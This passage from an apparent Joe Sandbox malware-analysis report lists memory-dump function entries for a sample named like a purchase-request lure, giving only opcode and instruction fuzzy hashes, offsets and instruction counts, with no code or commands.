Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2047f425a33d8e0d6bd3a9758c12f8be404da5342f871761009d4ba609455355
Instruction ID: 6db0fe7507f38bed4934e3943e186530d255e39746d07eb2c8bbe1d87719cc81
Opcode Fuzzy Hash: 2047f425a33d8e0d6bd3a9758c12f8be404da5342f871761009d4ba609455355
Instruction Fuzzy Hash: C1519E30A06204CFDB04EBA5E4097EAB3B3AB88311F28C169D40557759CB759EC69B86

Uniqueness

Uniqueness Score: -1.00%

Function 0061BAEF Relevance: .1, Instructions: 137COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 33f9560ff6058cd2d3cab023e8d76caad16953027a322f47d03bcbd0089e60f7
Instruction ID: 86a2e636e57a6a85aff4c8227c79453b11ae4d0d1c1d0e7d6b2eb268cfd5b6c9
Opcode Fuzzy Hash: 33f9560ff6058cd2d3cab023e8d76caad16953027a322f47d03bcbd0089e60f7
Instruction Fuzzy Hash: 23516D347092048FDB04EBA9E4597EAB3B3EBC8710F28D166D4059B39ADB349D85CB91

Uniqueness

Uniqueness Score: -1.00%

Function 006149C8 Relevance: .1, Instructions: 125COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01049ce0be7e9b818dcbc0497c0a4f3801cfec9e046dbf34b7d568d57a7cc6c0
Instruction ID: 0af41a92415af04396489858ffd9bdd3c2c0f8b11cf90cd90c74284d45658e31
Opcode Fuzzy Hash: 01049ce0be7e9b818dcbc0497c0a4f3801cfec9e046dbf34b7d568d57a7cc6c0
Instruction Fuzzy Hash: 7F41BF31B047548FCB64CB78E5542DBBBF2AF84310B08896ED05AD7B84DA30ED46CB81

Uniqueness

Uniqueness Score: -1.00%

Function 00603168 Relevance: .1, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419705833.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_600000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 84f270b5e8f07504b3da229ff7469882ed6b67cf8783b1c7607536e2320d906d
Instruction ID: e14c5650582683b74187c86ce25c938746a19be6f5441e98dcb058b4c245792e
Opcode Fuzzy Hash: 84f270b5e8f07504b3da229ff7469882ed6b67cf8783b1c7607536e2320d906d
Instruction Fuzzy Hash: A5415D34B403159FC718DF68D894BABBBF6AF89301F14C429E9059B394CB31EA06CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00611510 Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff7d15b4fcc036826e8b58748d69db3b73478006f6b16212fcc39c8acb1317e2
Instruction ID: 9c2c04d0b042be227e1b09a1c531df8219d056c995530b752bfdcbd7559dda93
Opcode Fuzzy Hash: ff7d15b4fcc036826e8b58748d69db3b73478006f6b16212fcc39c8acb1317e2
Instruction Fuzzy Hash: B741A631A002199FCB05DFA4D865AEEB7B2FF8D310F14806AD901BB3A1CB359D41CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0061FDB5 Relevance: .1, Instructions: 111COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 795c1c61360ebc1f5c85c23d7e391f0224877fe02157e340e7f16577735c593d
Instruction ID: ba0a20db8e7f26d5e49d4e0fb88f21a6fb3958b7912600eb09857f645d5b9a8c
Opcode Fuzzy Hash: 795c1c61360ebc1f5c85c23d7e391f0224877fe02157e340e7f16577735c593d
Instruction Fuzzy Hash: A231B575B042408FC7059F68D4547AA7BF2EF85300F2488BAD509DF2A6DB71DC46CB91

Uniqueness

Uniqueness Score: -1.00%

Function 004F55B3 Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419429408.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7f5cb77d8b667a6bd8b8208d5adfeb65971723dc341892e91ab9dc4efcb336f7
Instruction ID: da94484996c0e4dc474882edb835be35f99bf22da5d7f4e7fb77821424cde779
Opcode Fuzzy Hash: 7f5cb77d8b667a6bd8b8208d5adfeb65971723dc341892e91ab9dc4efcb336f7
Instruction Fuzzy Hash: 61312830A0464A8BDB05CF68C8106EFFBB2AFC5304F14813BD604EB745DA758986CB96

Uniqueness

Uniqueness Score: -1.00%

Function 0060E538 Relevance: .1, Instructions: 103COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419705833.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_600000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aea103dff92daf68fcd92575bb16c4de58d044f10bd1097836722c5edba6bea7
Instruction ID: 509c7065617a16ae78e859dc6b701401733a22ade59d83e5e45c1ecf593c286e
Opcode Fuzzy Hash: aea103dff92daf68fcd92575bb16c4de58d044f10bd1097836722c5edba6bea7
Instruction Fuzzy Hash: D53138366401189FCB09CF68D988E99BBB2FF48324F0684A8E5099B372D732EC15DF40

Uniqueness

Uniqueness Score: -1.00%

Function 006032F8 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419705833.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_600000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf00b18f3506baa29c1f84542c48a411d44ff3330fcaf85696760522cd9a37b5
Instruction ID: e6da276792cc1eb12bc42d8f68d3e3c33ed13fe0d1c80de37a55e081015e6e0c
Opcode Fuzzy Hash: cf00b18f3506baa29c1f84542c48a411d44ff3330fcaf85696760522cd9a37b5
Instruction Fuzzy Hash: E9416C31A407258FDB18CFA5D9846AFBBB6FF88306F108429D505E73A0EB319E45CB90

Uniqueness

Uniqueness Score: -1.00%

Function 007DFCC0 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.420080510.00000000007D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6a7680bcfbbc45a4873cc08a5e5f75a7c6e8d5ecd693573693bbf901ffb9228
Instruction ID: 1c5b6286c980766359e1c1b93ed1ee0450ce3d6dc2a89f07add1508ca9636f68
Opcode Fuzzy Hash: c6a7680bcfbbc45a4873cc08a5e5f75a7c6e8d5ecd693573693bbf901ffb9228
Instruction Fuzzy Hash: BA310B70A002099FCB05EFA4D955AADBBF2FF88311F108929D416A7355DB39AE45CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0060CFB0 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419705833.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_600000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 60f2d7781ba90592d2064f4bbd00436754bb4895efa7faaa8c6e9e451b80f59f
Instruction ID: 14fa3a8820a42cbecb1fe2c59f8912cf66621039b68806db486b6e6e61b3488d
Opcode Fuzzy Hash: 60f2d7781ba90592d2064f4bbd00436754bb4895efa7faaa8c6e9e451b80f59f
Instruction Fuzzy Hash: EE212B313052408FC7258BA9F9446A67BD6DFC2361B0985BBE00EC7292DB21EC42C751

Uniqueness

Uniqueness Score: -1.00%

Function 00605A5F Relevance: .1, Instructions: 85COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419705833.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_600000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d9f03b4e01b6f289736d6be3b0e7e74887432b20d591c64f8a31020920edb739
Instruction ID: 89886641366cfb35aa08f016108599de7e03b893e4b1baba8285d444577b4edf
Opcode Fuzzy Hash: d9f03b4e01b6f289736d6be3b0e7e74887432b20d591c64f8a31020920edb739
Instruction Fuzzy Hash: 6C11CD5218F3D22FCB1347B46C75486BF709E5316176A4ADBD5C4CA4E3C14C099BC7A2

Uniqueness

Uniqueness Score: -1.00%

Function 04EFFD90 Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.433650657.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4ee0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b3568a45a4db8bd4333be852bf026cfc3cff0feab9f5cedac7995f1c17ab63b
Instruction ID: a8ad40879535e3ed1b554c6d5efa700c215a05b6b6d3ece3f74290b522de683d
Opcode Fuzzy Hash: 0b3568a45a4db8bd4333be852bf026cfc3cff0feab9f5cedac7995f1c17ab63b
Instruction Fuzzy Hash: DE319E31B04104CFDB10EF65E9097EEB3B3EB88325F249066D6016728ACB74A985CB95

Uniqueness

Uniqueness Score: -1.00%

Function 004F5999 Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419429408.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d7bcb79b7cf216d1e3a5df9f7badc4b8f18206fc8a9d344399ebedf9089f9ae
Instruction ID: bd120155354c9475d29cca0884aec7ba498afb743ee936530730405142d99493
Opcode Fuzzy Hash: 8d7bcb79b7cf216d1e3a5df9f7badc4b8f18206fc8a9d344399ebedf9089f9ae
Instruction Fuzzy Hash: 9F314C74A00619CBDB28CB10C590FBAB3B2AF54704F6181CADB4AA7355D774EE81DF85

Uniqueness

Uniqueness Score: -1.00%

Function 004F6748 Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419429408.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8cb89a5b147fd0819809ae216310507f66c73f228c42e10ae05854df47c52d7
Instruction ID: 0cc83ec34cc323dc9f42712ac8c7e3f4137d9eb2eef9a3044c4883bbf554cae4
Opcode Fuzzy Hash: b8cb89a5b147fd0819809ae216310507f66c73f228c42e10ae05854df47c52d7
Instruction Fuzzy Hash: 68213A30B0061907D719796698907BF96DB9FC1714F19863F930957385CE7EAD0243D9

Uniqueness

Uniqueness Score: -1.00%

Function 004F5A4D Relevance: .1, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419429408.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 093cdb516298a7d98bb8dbb4ee7982701f470bc3c68a389803f488f8de57322f
Instruction ID: a00c28b20cd444aa299c87a4017f4bdc6a7fa09f4e712ce9c665cf223d4ce9e4
Opcode Fuzzy Hash: 093cdb516298a7d98bb8dbb4ee7982701f470bc3c68a389803f488f8de57322f
Instruction Fuzzy Hash: 0C315C74A006298BDB24CB10C590BBEB3B2AF54700F6181CADB4AA7351D774EE81DF85

Uniqueness

Uniqueness Score: -1.00%

Function 0060F610 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419705833.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_600000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21df5f8e63444cf25071e7e5c077568b5d478bac20e33c7aa97a06edfb13680b
Instruction ID: 4d14c3951a2296932bdeb2977b29484943574f87cf89d27d2d9d1873ff089f5d
Opcode Fuzzy Hash: 21df5f8e63444cf25071e7e5c077568b5d478bac20e33c7aa97a06edfb13680b
Instruction Fuzzy Hash: C5218874B10A09CFCB04EF68D5545AEB7B6FF89700F10412AE516A7360EF70A946CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0061BCF5 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41a93cb0d7d359d081b9f8f316ac290c80788ec47be1d4f81a657abc81ecc5fd
Instruction ID: eecd404e09ae23b7b986e69bb1b5410f81f86297b26ad5124e71f7d673681e78
Opcode Fuzzy Hash: 41a93cb0d7d359d081b9f8f316ac290c80788ec47be1d4f81a657abc81ecc5fd
Instruction Fuzzy Hash: A6314931A09204CFE714DB5AE4897E973B3EB88311F6DD0A6D5048B3A9C7749EC6DB81

Uniqueness

Uniqueness Score: -1.00%

Function 007D0012 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.420080510.00000000007D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5581d03d8324408a84dac049884a368c690930603b4a7dc84c63fb8adeb7b18e
Instruction ID: de23c1e081cd035961d8752a6c2aaa36cf655317646faf29b6d06cbe82f95b8d
Opcode Fuzzy Hash: 5581d03d8324408a84dac049884a368c690930603b4a7dc84c63fb8adeb7b18e
Instruction Fuzzy Hash: 613122B0808284EFCB22CB24D8947EDBFF2AF56300F1580ABD004AB792D7395D85DB91

Uniqueness

Uniqueness Score: -1.00%

Function 000DD4D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.418364494.00000000000DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000DD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_dd000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 78115b18419a3e8ddf0367e8df167f6f020cdf0d409ab58865a5b5a314b63103
Instruction ID: 9a02027184d901c2ef5d2e699642e79749cc56b023457f779d639663cd7af270
Opcode Fuzzy Hash: 78115b18419a3e8ddf0367e8df167f6f020cdf0d409ab58865a5b5a314b63103
Instruction Fuzzy Hash: CE21D3B1604740EFDB15CF14E9C0B2ABFA5EB98318F24856BE8054B35AC336D956CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 0060E528 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419705833.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_600000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9fd765ee05628745458726e77a1848672857c1656909f9cb57624546a72b5830
Instruction ID: 172cc4bb6d4e556cc1d7a31b40cd2191e3e64bce8fdef0ba3a55728289c2682d
Opcode Fuzzy Hash: 9fd765ee05628745458726e77a1848672857c1656909f9cb57624546a72b5830
Instruction Fuzzy Hash: 85211D366411149FCB09CFA8D948D99BBB2FF48320B1644A9E5099B372D732ED15DB40

Uniqueness

Uniqueness Score: -1.00%

Function 00605B20 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419705833.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_600000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e7c324677b58a90d97e8a33beca13e878d9dfe556ab23680b206f815c7a69f7
Instruction ID: 05bb1c6ec49811bea54533ce59356363fe3021f385315ba9bcccedfdd579a16c
Opcode Fuzzy Hash: 1e7c324677b58a90d97e8a33beca13e878d9dfe556ab23680b206f815c7a69f7
Instruction Fuzzy Hash: C1216635A406099FDB18DBB8C414BEFBBF6EB04340F248066D80ADB290E734EA11DF90

Uniqueness

Uniqueness Score: -1.00%

Function 004F5B06 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419429408.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da1b3a671e42ecc6bf5061e0e14c1f46766cb7ccc355c92c858f0e44fe2adda9
Instruction ID: d57893d75a24f28dc4a80ef626439bd493dbb50380590a6ee270a10a757c39d5
Opcode Fuzzy Hash: da1b3a671e42ecc6bf5061e0e14c1f46766cb7ccc355c92c858f0e44fe2adda9
Instruction Fuzzy Hash: 35316D74A00629CBDB24CB10C590BBEB7B1AF58700F5141CADB4AA7351D774AE81DF85

Uniqueness

Uniqueness Score: -1.00%

Function 0060F600 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419705833.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_600000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8590663a7dcfc82b9b49bf22f78ace71ddba6f17d39d4bb7f1b36f247597b1c9
Instruction ID: e6501e05e9b27a39fe7bce95751ece1440fcde4b8772b54e2969665a3ecf89db
Opcode Fuzzy Hash: 8590663a7dcfc82b9b49bf22f78ace71ddba6f17d39d4bb7f1b36f247597b1c9
Instruction Fuzzy Hash: 3221AA74A14A05CFC705EFA8D4545AEBBF1FF8A300B10426FD505D73A1EB349946CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0060A848 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419705833.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_600000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30fdf8306e794061e02c7c4dd79a9ca2c81b08660fea5aec759d068ced2c038d
Instruction ID: aa0c7620223d57a3a09aab3b5bc31c972cf32490a0d508aaa28f1985477ef1f9
Opcode Fuzzy Hash: 30fdf8306e794061e02c7c4dd79a9ca2c81b08660fea5aec759d068ced2c038d
Instruction Fuzzy Hash: 4D210871A402098FCB18DF98C945ADEB7F2FF48300F6145A9E405AB3A1DB769E45CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 004F5BBF Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419429408.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a01636e426056f781bcfedc8ad26f1ac190eedae8307730958be70ee4e21471
Instruction ID: adc6784ab39afab344aafcfa1bce4bf6cf7edfdb5716668762c6c8f1b2f151bd
Opcode Fuzzy Hash: 7a01636e426056f781bcfedc8ad26f1ac190eedae8307730958be70ee4e21471
Instruction Fuzzy Hash: 06217C74A00629CBDB24CB10C590FBEB7B1AF58700F5141CADB4AA7351DB78AE81DF85

Uniqueness

Uniqueness Score: -1.00%

Function 0061BDC2 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 23d8dc61859a4cfe276efb8376c36ea2c635a5f7dbf1fd09e4a5e8dc1907bca4
Instruction ID: 07b0d50b07432cd5d731261c3618cc77b91c7464cc14ff2a4a226d2d1e3736a4
Opcode Fuzzy Hash: 23d8dc61859a4cfe276efb8376c36ea2c635a5f7dbf1fd09e4a5e8dc1907bca4
Instruction Fuzzy Hash: D6216B31A09204CFE714DB66E8887E973B3AB88311F6CE0A6D5014B269C7749DC6CB81

Uniqueness

Uniqueness Score: -1.00%

Function 0060A839 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419705833.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_600000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5869725df733baca9cbdb90226ee61f35ae937406f80548b85041927db27c907
Instruction ID: 642cde1717049483f355b35d2a774da972a05aabfb9aa3a8b68986ff45d93439
Opcode Fuzzy Hash: 5869725df733baca9cbdb90226ee61f35ae937406f80548b85041927db27c907
Instruction Fuzzy Hash: 5B216B71A402098FCB18DF94C955ADEB7F2BF48300F6045A9E401AB3A1CB769D46CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 007DF1B0 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.420080510.00000000007D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3c33be9071876e9d07c083332d7f073541c19657c709ec6f8d6f7ad72913d30
Instruction ID: fe2abb5a2b91733c80a27b90206424f65e8e979cc72d4091f3e9098b9af257c4
Opcode Fuzzy Hash: a3c33be9071876e9d07c083332d7f073541c19657c709ec6f8d6f7ad72913d30
Instruction Fuzzy Hash: 43210474600A008FC324DF59E544A5AFBF5FF84324F59CA6AE49A8B7A2C774F8458B90

Uniqueness

Uniqueness Score: -1.00%

Function 0061C15F Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 956db4cea0340be7764fef6f317913b9163f140402ec590c50bc4810c2bf4a2e
Instruction ID: 210f5193e19fec786529e14f09a7fa05f6c1e19c1cccca6de6c1ddaa4f2bed63
Opcode Fuzzy Hash: 956db4cea0340be7764fef6f317913b9163f140402ec590c50bc4810c2bf4a2e
Instruction Fuzzy Hash: 0B218C31A4A204CFD714EB25E4897E972B3AB89711FACD0B5D4004B36AC7349EC5CB81

Uniqueness

Uniqueness Score: -1.00%

Function 00610E38 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d2e98072dd66e381c3052ae8b46725af60b5d6e8a36e47052203790dc2e01c3e
Instruction ID: 063a4f0086d6b802e35453c62e634a762f8922ffec5d11ddfc99b2b3c4b5c7a3
Opcode Fuzzy Hash: d2e98072dd66e381c3052ae8b46725af60b5d6e8a36e47052203790dc2e01c3e
Instruction Fuzzy Hash: FA21C0347402048FCB15DF24D894AAEBBF6EFC9310B14456AE506D73A2CB70AD49CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0060B940 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419705833.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_600000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8434e1509c57c8fb878267725606554195f0f8cfd16877040c520c4f4e574104
Instruction ID: f105dc919bdc75ca71b1b071af16764ade0bd1b52d82b4bbc8c7adcb9c63ae71
Opcode Fuzzy Hash: 8434e1509c57c8fb878267725606554195f0f8cfd16877040c520c4f4e574104
Instruction Fuzzy Hash: ED21BE30904656EFCF09CF98C9809AAFBB2FF45300F12C96AD60597685D774AC95CB84

Uniqueness

Uniqueness Score: -1.00%

Function 004F6678 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419429408.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b902d8e81b5be8392980a1402f57ebcbecb852be9996320852b48cd0c42d661
Instruction ID: fe310d8164c6cf8412d71e1c31b86b9d8aadbc4028c1d903d5001cd4e1287d37
Opcode Fuzzy Hash: 0b902d8e81b5be8392980a1402f57ebcbecb852be9996320852b48cd0c42d661
Instruction Fuzzy Hash: CA112330B006194BE725AA2A8860A7FF7EA9FC0710F05853F9A19D7380CE78AC015395

Uniqueness

Uniqueness Score: -1.00%

Function 004F5C75 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419429408.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67dbb454993a3d5844d4bc274fc53c53ae47d9c3475e7cc52563a874f6fdcb3d
Instruction ID: 5c6ccbe944b2f07221a3b1d56f18029f7fccf1e42ac4e320cbe6fc2e5177c01d
Opcode Fuzzy Hash: 67dbb454993a3d5844d4bc274fc53c53ae47d9c3475e7cc52563a874f6fdcb3d
Instruction Fuzzy Hash: A0219D70A00629CBDF24CB10C990BBEB7B1AF58700F5041CADB4AA7741DB789E81CF85

Uniqueness

Uniqueness Score: -1.00%

Function 0060F4E0 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

